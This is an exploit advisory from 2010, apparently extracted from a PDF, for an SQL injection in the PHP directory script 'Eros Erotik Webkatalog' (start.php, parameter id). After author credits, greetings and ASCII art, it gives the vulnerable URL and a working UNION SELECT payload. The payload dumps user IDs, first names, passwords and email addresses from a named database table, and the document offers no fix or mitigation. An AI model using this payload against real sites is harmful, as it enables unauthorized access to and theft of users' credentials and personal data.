Eros Erotik Webkatalog start.php rubrikid SQL Injection Vulnerability.pdf

1 −−−−−−−−−−−−−−−−−−−−−−−−−−−−Information−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 2 +Name : Eros Erotik Webkatalog start.php (rubrik&id)SQL Injection 3 +Autor : Easy Laster 4 +Date : 11.03.2010 5 +Script : Eros Erotik Webkatalog 6 +Price : 07,13M−^@ 7 +Language :PHP 8 +Discovered by Easy Laster 9 +Security Group 4004−Security−Project 10 +Greetz to Team−Internet ,Underground Agents 11 +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, 12 Kiba,−tmh−,Dr Chaos,HANN!BAL,Kabel,−=Player=−,Lidloses_Auge, 13 N00bor,Ic3Drag0n,novaca!ne. 14 15 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 16 17 ___ ___ ___ ___ _ _ _____ _ _ 18 | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ 19 |_ | | | | |_ |___|_ −| −_| _| | | _| | _| | |___| __| _| . | | | −_| _| _| 20 |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| 21 |___| |___| 22 23 24 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 25 +Vulnerability : www.site.com/webkatalog/start.php?go=rubrik&id= 26 +Exploitable : www.site.com/webkatalog/start.php?go=rubrik&id=−1+union+select+1,2,3,4, 27 5,6,7,8,9,concat(id,0x3a,vorname,0x3a,passwort,0x3,mail),11,12,13,14,15+from+php005_4_eintrag−− 28 ^^"table name"^^ 29 −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− Page 1/1 Eros Erotik Webkatalog start.php rubrikid SQL Injection Vulnerability Easy Laster 03/11/2010